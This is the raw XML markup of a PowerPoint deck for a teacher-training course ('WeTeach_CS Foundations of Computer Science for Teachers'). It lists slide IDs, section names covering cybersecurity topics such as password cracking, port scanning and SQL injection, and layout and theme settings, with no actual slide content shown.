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2" r:id="rId1"/>
    <p:sldMasterId id="2147483667" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId202"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="344" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="345" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="440" r:id="rId9"/>
    <p:sldId id="442" r:id="rId10"/>
    <p:sldId id="441" r:id="rId11"/>
    <p:sldId id="443" r:id="rId12"/>
    <p:sldId id="444" r:id="rId13"/>
    <p:sldId id="445" r:id="rId14"/>
    <p:sldId id="446" r:id="rId15"/>
    <p:sldId id="447" r:id="rId16"/>
    <p:sldId id="448" r:id="rId17"/>
    <p:sldId id="450" r:id="rId18"/>
    <p:sldId id="451" r:id="rId19"/>
    <p:sldId id="452" r:id="rId20"/>
    <p:sldId id="453" r:id="rId21"/>
    <p:sldId id="454" r:id="rId22"/>
    <p:sldId id="455" r:id="rId23"/>
    <p:sldId id="456" r:id="rId24"/>
    <p:sldId id="457" r:id="rId25"/>
    <p:sldId id="458" r:id="rId26"/>
    <p:sldId id="459" r:id="rId27"/>
    <p:sldId id="460" r:id="rId28"/>
    <p:sldId id="466" r:id="rId29"/>
    <p:sldId id="467" r:id="rId30"/>
    <p:sldId id="462" r:id="rId31"/>
    <p:sldId id="461" r:id="rId32"/>
    <p:sldId id="463" r:id="rId33"/>
    <p:sldId id="421" r:id="rId34"/>
    <p:sldId id="274" r:id="rId35"/>
    <p:sldId id="275" r:id="rId36"/>
    <p:sldId id="284" r:id="rId37"/>
    <p:sldId id="281" r:id="rId38"/>
    <p:sldId id="282" r:id="rId39"/>
    <p:sldId id="283" r:id="rId40"/>
    <p:sldId id="285" r:id="rId41"/>
    <p:sldId id="286" r:id="rId42"/>
    <p:sldId id="287" r:id="rId43"/>
    <p:sldId id="290" r:id="rId44"/>
    <p:sldId id="288" r:id="rId45"/>
    <p:sldId id="289" r:id="rId46"/>
    <p:sldId id="291" r:id="rId47"/>
    <p:sldId id="292" r:id="rId48"/>
    <p:sldId id="293" r:id="rId49"/>
    <p:sldId id="294" r:id="rId50"/>
    <p:sldId id="295" r:id="rId51"/>
    <p:sldId id="296" r:id="rId52"/>
    <p:sldId id="305" r:id="rId53"/>
    <p:sldId id="307" r:id="rId54"/>
    <p:sldId id="297" r:id="rId55"/>
    <p:sldId id="298" r:id="rId56"/>
    <p:sldId id="299" r:id="rId57"/>
    <p:sldId id="300" r:id="rId58"/>
    <p:sldId id="301" r:id="rId59"/>
    <p:sldId id="302" r:id="rId60"/>
    <p:sldId id="306" r:id="rId61"/>
    <p:sldId id="304" r:id="rId62"/>
    <p:sldId id="308" r:id="rId63"/>
    <p:sldId id="309" r:id="rId64"/>
    <p:sldId id="432" r:id="rId65"/>
    <p:sldId id="310" r:id="rId66"/>
    <p:sldId id="311" r:id="rId67"/>
    <p:sldId id="313" r:id="rId68"/>
    <p:sldId id="316" r:id="rId69"/>
    <p:sldId id="317" r:id="rId70"/>
    <p:sldId id="318" r:id="rId71"/>
    <p:sldId id="315" r:id="rId72"/>
    <p:sldId id="319" r:id="rId73"/>
    <p:sldId id="280" r:id="rId74"/>
    <p:sldId id="320" r:id="rId75"/>
    <p:sldId id="321" r:id="rId76"/>
    <p:sldId id="322" r:id="rId77"/>
    <p:sldId id="323" r:id="rId78"/>
    <p:sldId id="324" r:id="rId79"/>
    <p:sldId id="326" r:id="rId80"/>
    <p:sldId id="276" r:id="rId81"/>
    <p:sldId id="327" r:id="rId82"/>
    <p:sldId id="328" r:id="rId83"/>
    <p:sldId id="346" r:id="rId84"/>
    <p:sldId id="277" r:id="rId85"/>
    <p:sldId id="333" r:id="rId86"/>
    <p:sldId id="425" r:id="rId87"/>
    <p:sldId id="426" r:id="rId88"/>
    <p:sldId id="427" r:id="rId89"/>
    <p:sldId id="424" r:id="rId90"/>
    <p:sldId id="335" r:id="rId91"/>
    <p:sldId id="336" r:id="rId92"/>
    <p:sldId id="337" r:id="rId93"/>
    <p:sldId id="332" r:id="rId94"/>
    <p:sldId id="278" r:id="rId95"/>
    <p:sldId id="331" r:id="rId96"/>
    <p:sldId id="329" r:id="rId97"/>
    <p:sldId id="349" r:id="rId98"/>
    <p:sldId id="338" r:id="rId99"/>
    <p:sldId id="339" r:id="rId100"/>
    <p:sldId id="340" r:id="rId101"/>
    <p:sldId id="330" r:id="rId102"/>
    <p:sldId id="348" r:id="rId103"/>
    <p:sldId id="350" r:id="rId104"/>
    <p:sldId id="428" r:id="rId105"/>
    <p:sldId id="351" r:id="rId106"/>
    <p:sldId id="352" r:id="rId107"/>
    <p:sldId id="429" r:id="rId108"/>
    <p:sldId id="353" r:id="rId109"/>
    <p:sldId id="354" r:id="rId110"/>
    <p:sldId id="430" r:id="rId111"/>
    <p:sldId id="431" r:id="rId112"/>
    <p:sldId id="355" r:id="rId113"/>
    <p:sldId id="357" r:id="rId114"/>
    <p:sldId id="356" r:id="rId115"/>
    <p:sldId id="358" r:id="rId116"/>
    <p:sldId id="347" r:id="rId117"/>
    <p:sldId id="279" r:id="rId118"/>
    <p:sldId id="359" r:id="rId119"/>
    <p:sldId id="360" r:id="rId120"/>
    <p:sldId id="361" r:id="rId121"/>
    <p:sldId id="363" r:id="rId122"/>
    <p:sldId id="362" r:id="rId123"/>
    <p:sldId id="343" r:id="rId124"/>
    <p:sldId id="364" r:id="rId125"/>
    <p:sldId id="365" r:id="rId126"/>
    <p:sldId id="368" r:id="rId127"/>
    <p:sldId id="369" r:id="rId128"/>
    <p:sldId id="370" r:id="rId129"/>
    <p:sldId id="468" r:id="rId130"/>
    <p:sldId id="371" r:id="rId131"/>
    <p:sldId id="372" r:id="rId132"/>
    <p:sldId id="373" r:id="rId133"/>
    <p:sldId id="469" r:id="rId134"/>
    <p:sldId id="374" r:id="rId135"/>
    <p:sldId id="375" r:id="rId136"/>
    <p:sldId id="435" r:id="rId137"/>
    <p:sldId id="436" r:id="rId138"/>
    <p:sldId id="385" r:id="rId139"/>
    <p:sldId id="366" r:id="rId140"/>
    <p:sldId id="367" r:id="rId141"/>
    <p:sldId id="376" r:id="rId142"/>
    <p:sldId id="377" r:id="rId143"/>
    <p:sldId id="381" r:id="rId144"/>
    <p:sldId id="378" r:id="rId145"/>
    <p:sldId id="379" r:id="rId146"/>
    <p:sldId id="380" r:id="rId147"/>
    <p:sldId id="382" r:id="rId148"/>
    <p:sldId id="386" r:id="rId149"/>
    <p:sldId id="383" r:id="rId150"/>
    <p:sldId id="387" r:id="rId151"/>
    <p:sldId id="388" r:id="rId152"/>
    <p:sldId id="393" r:id="rId153"/>
    <p:sldId id="384" r:id="rId154"/>
    <p:sldId id="389" r:id="rId155"/>
    <p:sldId id="390" r:id="rId156"/>
    <p:sldId id="394" r:id="rId157"/>
    <p:sldId id="395" r:id="rId158"/>
    <p:sldId id="391" r:id="rId159"/>
    <p:sldId id="392" r:id="rId160"/>
    <p:sldId id="400" r:id="rId161"/>
    <p:sldId id="402" r:id="rId162"/>
    <p:sldId id="401" r:id="rId163"/>
    <p:sldId id="404" r:id="rId164"/>
    <p:sldId id="397" r:id="rId165"/>
    <p:sldId id="396" r:id="rId166"/>
    <p:sldId id="422" r:id="rId167"/>
    <p:sldId id="423" r:id="rId168"/>
    <p:sldId id="405" r:id="rId169"/>
    <p:sldId id="437" r:id="rId170"/>
    <p:sldId id="398" r:id="rId171"/>
    <p:sldId id="438" r:id="rId172"/>
    <p:sldId id="406" r:id="rId173"/>
    <p:sldId id="399" r:id="rId174"/>
    <p:sldId id="439" r:id="rId175"/>
    <p:sldId id="412" r:id="rId176"/>
    <p:sldId id="413" r:id="rId177"/>
    <p:sldId id="420" r:id="rId178"/>
    <p:sldId id="414" r:id="rId179"/>
    <p:sldId id="482" r:id="rId180"/>
    <p:sldId id="484" r:id="rId181"/>
    <p:sldId id="485" r:id="rId182"/>
    <p:sldId id="486" r:id="rId183"/>
    <p:sldId id="487" r:id="rId184"/>
    <p:sldId id="488" r:id="rId185"/>
    <p:sldId id="492" r:id="rId186"/>
    <p:sldId id="490" r:id="rId187"/>
    <p:sldId id="415" r:id="rId188"/>
    <p:sldId id="418" r:id="rId189"/>
    <p:sldId id="416" r:id="rId190"/>
    <p:sldId id="471" r:id="rId191"/>
    <p:sldId id="472" r:id="rId192"/>
    <p:sldId id="473" r:id="rId193"/>
    <p:sldId id="474" r:id="rId194"/>
    <p:sldId id="475" r:id="rId195"/>
    <p:sldId id="476" r:id="rId196"/>
    <p:sldId id="417" r:id="rId197"/>
    <p:sldId id="478" r:id="rId198"/>
    <p:sldId id="481" r:id="rId199"/>
    <p:sldId id="479" r:id="rId200"/>
    <p:sldId id="261" r:id="rId201"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId20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BF7B70-4F0C-4650-82FB-088027053CF5}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Introduction" id="{B2690E5F-B54C-4830-BE57-9D71C9666E1D}">
          <p14:sldIdLst>
            <p14:sldId id="344"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Vocab" id="{5A4393EB-EE9D-4A6D-B682-82B4D567C411}">
          <p14:sldIdLst>
            <p14:sldId id="345"/>
            <p14:sldId id="273"/>
            <p14:sldId id="440"/>
            <p14:sldId id="442"/>
            <p14:sldId id="441"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="445"/>
            <p14:sldId id="446"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="452"/>
            <p14:sldId id="453"/>
            <p14:sldId id="454"/>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="457"/>
            <p14:sldId id="458"/>
            <p14:sldId id="459"/>
            <p14:sldId id="460"/>
            <p14:sldId id="466"/>
            <p14:sldId id="467"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Books" id="{80CE4258-2CCC-4816-A704-1554D169F467}">
          <p14:sldIdLst>
            <p14:sldId id="462"/>
            <p14:sldId id="461"/>
            <p14:sldId id="463"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Laws" id="{0DD2560E-E544-41FB-AEFC-8D67718F13EF}">
          <p14:sldIdLst>
            <p14:sldId id="421"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="284"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="290"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="291"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="305"/>
            <p14:sldId id="307"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
            <p14:sldId id="302"/>
            <p14:sldId id="306"/>
            <p14:sldId id="304"/>
            <p14:sldId id="308"/>
            <p14:sldId id="309"/>
            <p14:sldId id="432"/>
            <p14:sldId id="310"/>
            <p14:sldId id="311"/>
            <p14:sldId id="313"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
            <p14:sldId id="318"/>
            <p14:sldId id="315"/>
            <p14:sldId id="319"/>
            <p14:sldId id="280"/>
            <p14:sldId id="320"/>
            <p14:sldId id="321"/>
            <p14:sldId id="322"/>
            <p14:sldId id="323"/>
            <p14:sldId id="324"/>
            <p14:sldId id="326"/>
            <p14:sldId id="276"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Case Studies" id="{3B0D2723-737E-43A7-B5B7-8E2E5312BA37}">
          <p14:sldIdLst>
            <p14:sldId id="346"/>
            <p14:sldId id="277"/>
            <p14:sldId id="333"/>
            <p14:sldId id="425"/>
            <p14:sldId id="426"/>
            <p14:sldId id="427"/>
            <p14:sldId id="424"/>
            <p14:sldId id="335"/>
            <p14:sldId id="336"/>
            <p14:sldId id="337"/>
            <p14:sldId id="332"/>
            <p14:sldId id="278"/>
            <p14:sldId id="331"/>
            <p14:sldId id="329"/>
            <p14:sldId id="349"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
            <p14:sldId id="340"/>
            <p14:sldId id="330"/>
            <p14:sldId id="348"/>
            <p14:sldId id="350"/>
            <p14:sldId id="428"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="429"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="430"/>
            <p14:sldId id="431"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="356"/>
            <p14:sldId id="358"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Networking Concepts" id="{60C44094-9598-449D-A938-B89BB4B202F2}">
          <p14:sldIdLst>
            <p14:sldId id="347"/>
            <p14:sldId id="279"/>
            <p14:sldId id="359"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="363"/>
            <p14:sldId id="362"/>
            <p14:sldId id="343"/>
            <p14:sldId id="364"/>
            <p14:sldId id="365"/>
            <p14:sldId id="368"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="468"/>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="469"/>
            <p14:sldId id="374"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Accessing Cyber Range" id="{8080DDD1-F715-49BA-8DE8-6CC6CC0E5525}">
          <p14:sldIdLst>
            <p14:sldId id="375"/>
            <p14:sldId id="435"/>
            <p14:sldId id="436"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Linux Introduction" id="{0BF8A7F3-C1B6-4C46-BDA7-A7F826704347}">
          <p14:sldIdLst>
            <p14:sldId id="385"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="381"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="382"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Linux Networking" id="{068A7DFD-4EB8-4F2D-8A80-621866714C63}">
          <p14:sldIdLst>
            <p14:sldId id="386"/>
            <p14:sldId id="383"/>
            <p14:sldId id="387"/>
            <p14:sldId id="388"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Password Cracking" id="{0AD6FAA0-1062-4BA6-95E0-BF86B1393897}">
          <p14:sldIdLst>
            <p14:sldId id="393"/>
            <p14:sldId id="384"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
            <p14:sldId id="394"/>
            <p14:sldId id="395"/>
            <p14:sldId id="391"/>
            <p14:sldId id="392"/>
            <p14:sldId id="400"/>
            <p14:sldId id="402"/>
            <p14:sldId id="401"/>
            <p14:sldId id="404"/>
            <p14:sldId id="397"/>
            <p14:sldId id="396"/>
            <p14:sldId id="422"/>
            <p14:sldId id="423"/>
            <p14:sldId id="405"/>
            <p14:sldId id="437"/>
            <p14:sldId id="398"/>
            <p14:sldId id="438"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Port Scanning" id="{08CCFC27-144F-46B3-94AE-11519826556A}">
          <p14:sldIdLst>
            <p14:sldId id="406"/>
            <p14:sldId id="399"/>
            <p14:sldId id="439"/>
            <p14:sldId id="412"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Packet Sniffing" id="{EB6D17B9-8DC8-482A-971E-D245A6ACE911}">
          <p14:sldIdLst>
            <p14:sldId id="413"/>
            <p14:sldId id="420"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Web Vulnerabilities" id="{0517D753-C8BE-466A-9DC9-105E46127338}">
          <p14:sldIdLst>
            <p14:sldId id="414"/>
            <p14:sldId id="482"/>
            <p14:sldId id="484"/>
            <p14:sldId id="485"/>
            <p14:sldId id="486"/>
            <p14:sldId id="487"/>
            <p14:sldId id="488"/>
            <p14:sldId id="492"/>
            <p14:sldId id="490"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Networking Recon" id="{359E3883-EC9D-4CD3-A40E-492B6C4044E0}">
          <p14:sldIdLst>
            <p14:sldId id="415"/>
            <p14:sldId id="418"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQL Injection" id="{14D78053-C3D8-4806-89F8-4136D9D1C2DF}">
          <p14:sldIdLst>
            <p14:sldId id="416"/>
            <p14:sldId id="471"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="417"/>
            <p14:sldId id="478"/>
            <p14:sldId id="481"/>
            <p14:sldId id="479"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Closing" id="{D91B3874-4517-4617-B92F-B938C64B97E2}">
          <p14:sldIdLst>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5812"/>
    <a:srgbClr val="333F48"/>
    <a:srgbClr val="C95D13"/>
    <a:srgbClr val="CD5F13"/>
    <a:srgbClr val="CD580B"/>
    <a:srgbClr val="CD5514"/>
    <a:srgbClr val="CD6B00"/>
    <a:srgbClr val="CD692B"/>
    <a:srgbClr val="CD6620"/>
    <a:srgbClr val="CD64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6357" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="752" y="4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theme" Target="theme/theme1.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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId207"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C3761-C686-0D4C-AE9F-DE358BD3014D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/15/2019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9C3B6-F927-424A-BFB7-8EB0E0CB9E5C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148390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0</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162534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198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1608038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C9F210-DB9E-4CE5-9158-6B7B1F31F5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2" y="1153686"/>
            <a:ext cx="4207084" cy="2636439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1590272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291" name="image3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10807783" y="6462974"/>
            <a:ext cx="987753" cy="116952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005B63C3-0A88-4FAE-B68B-50FBC9B09274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011959" y="1476639"/>
            <a:ext cx="10168081" cy="3837854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F385579-B5D8-4DA5-8EAF-14EE623D67B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289299" y="739462"/>
            <a:ext cx="4470400" cy="619439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Page Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46CBC71-EDE8-4B2E-846F-AD4DFAE7ED03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198293" y="6337299"/>
            <a:ext cx="692726" cy="3683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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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9p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Vitesse Book" pitchFamily="50" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3C14B3-8C10-46F0-BB85-0015B9C4425E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7868" y="6090060"/>
            <a:ext cx="12187433" cy="778698"/>
            <a:chOff x="7868" y="6090060"/>
            <a:chExt cx="12187433" cy="778698"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Shape 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFD6C9B-7D78-43E6-B9CD-163FB211B5ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7868" y="6090060"/>
              <a:ext cx="12187433" cy="778698"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BE5812"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>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sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>                                  WeTeach_CS Foundations of Computer Science for Teachers                                                   </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Lesson Main Title – </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>edit from slide master</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27EE80F2-3C8A-42A1-A369-D873B70F63C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="70728"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
